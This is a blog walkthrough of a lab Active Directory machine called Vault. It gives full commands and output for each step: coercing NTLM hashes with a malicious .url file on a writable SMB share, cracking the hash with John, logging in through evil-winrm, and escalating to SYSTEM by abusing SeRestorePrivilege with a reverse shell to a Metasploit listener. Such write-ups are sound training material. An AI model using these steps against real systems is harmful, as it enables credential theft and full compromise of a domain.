Vault

ZEROZERO
4 min read

The Vault machine is a medium-difficulty Active Directory (AD) box hosted on Hack The Box. This machine focuses on exploiting misconfigurations in SMB shares, capturing NTLM hashes, and leveraging privileges for privilege escalation. In this walkthrough, I’ll cover how I gained initial access, cracked credentials, and escalated privileges to achieve root access.

Step 1: Reconnaissance

I began by performing a full-port scan using nmap to identify open ports and services:

└─$ nmap -p- -sC -sV -T5 192.168.182.172

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-22 07:04:16Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: VAULT
|   NetBIOS_Domain_Name: VAULT
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: vault.offsec
|   DNS_Computer_Name: DC.vault.offsec
|   DNS_Tree_Name: vault.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-10-22T07:05:05+00:00

Step 2: Enumeration

SMB Enumeration

Using netexec, I enumerated the SMB shares to identify any writable shares:

└─$ netexec smb 192.168.182.172 -u 'zero' -p ''  --shares
Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
DocumentsShare  READ,WRITE      
IPC$            READ            Remote IPC
NETLOGON                        Logon server share
SYSVOL                          Logon server share

The DocumentsShare share has read and write permissions, which makes it a potential target for exploitation.

Exploiting Writable SMB Share

To capture NTLM hashes, I uploaded a malicious .url file to the DocumentsShare. This file would trigger a request to my attacker machine, allowing me to capture the hash using Responder.

Creating the Malicious File

I created a malicious.url file with the following content:

└─$ cat malicious.url 
[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\192.168.45.176\%USERNAME%.icon
IconIndex=1

Uploading the File

I used smbclient to upload the file to the DocumentsShare:

└─$ smbclient -N //192.168.182.172/DocumentsShare

Try "help" to get a list of possible commands.
smb: \> put malicious.url

Capturing the Hash

On my attacker machine, I ran Responder to capture the NTLM hash:

└─$ sudo responder -I tun0

After triggering the .url file, Responder captured the following hash:

[SMB] NTLMv2-SSP Client   : 192.168.182.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash     : anirudh::VAULT:02383bfb6e95da3a:6E48603B.....

Cracking the Hash

I used John the Ripper to crack the captured hash:

└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM         (anirudh)     
1g 0:00:00:01 DONE (2024-10-22 04:08) 0.5154g/s 5470Kp/s 5470Kc/s 5470KC/s Seifer@14..Sarahmasri
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

The password for the user anirudh is SecureHM.

Step 3: Initial Access

With valid credentials (anirudh:SecureHM), I logged into the machine using evil-winrm:

└─$ evil-winrm -i 192.168.182.172 -u 'vault.offsec\anirudh' -p 'SecureHM'

*Evil-WinRM* PS C:\Users\anirudh\Documents>

Success! I now had a shell as the anirudh user.

Step 4: Post-Exploitation

Running whoami /priv revealed that the anirudh account had the SeRestorePrivilege privilege, which allows restoring files with arbitrary ownership and ACLs:

*Evil-WinRM* PS C:\Users\anirudh> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

This privilege can be abused to execute commands as NT AUTHORITY\SYSTEM.

Step 5: Privilege Escalation

I downloaded the SeRestoreAbuse.exe tool from GitHub to exploit the SeRestorePrivilege. First, I uploaded the tool and a reverse shell executable to the target machine:

*Evil-WinRM* PS C:\Users\anirudh> upload ../home/zero/server/SeRestoreAbuse.exe
*Evil-WinRM* PS C:\Users\anirudh> upload ../home/zero/server/reverse.exe

Then, I executed the reverse shell as SYSTEM:

PS C:\Users\anirudh> SeRestoreAbuse.exe "cmd /c C:\users\anirudh\reverse.exe"

Then, the reverse shell connected to the multi/handler listener i set up before, and i got a shell as nt authority\system:

└─$ msfconsole -q -x "use multi/handler; set payload windows/x64/shell/reverse_tcp; set lhost 192.168.45.176; set lport 4444; exploit"
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/shell/reverse_tcp
lhost => 192.168.45.176
lport => 4444
[*] Started reverse TCP handler on 192.168.45.176:4444 
[*] Sending stage (336 bytes) to 192.168.182.172
[*] Command shell session 1 opened (192.168.45.176:4444 -> 192.168.182.172:51631) at 2024-10-22 06:04:34 -0400


Shell Banner:
Microsoft Windows [Version 10.0.17763.2300]
-----


C:\Windows\system32>whoami
whoami
nt authority\system
0
Subscribe to my newsletter

Read articles from ZERO directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Vault#HackTheBoxhtbhackingActive Directory

Written by

ZERO
ZERO

I'm Mohamed Nour Alhaj, an OSCP-certified penetration tester with a passion for ethical hacking and cybersecurity. I specialize in web, network, and Active Directory security and love sharing my knowledge.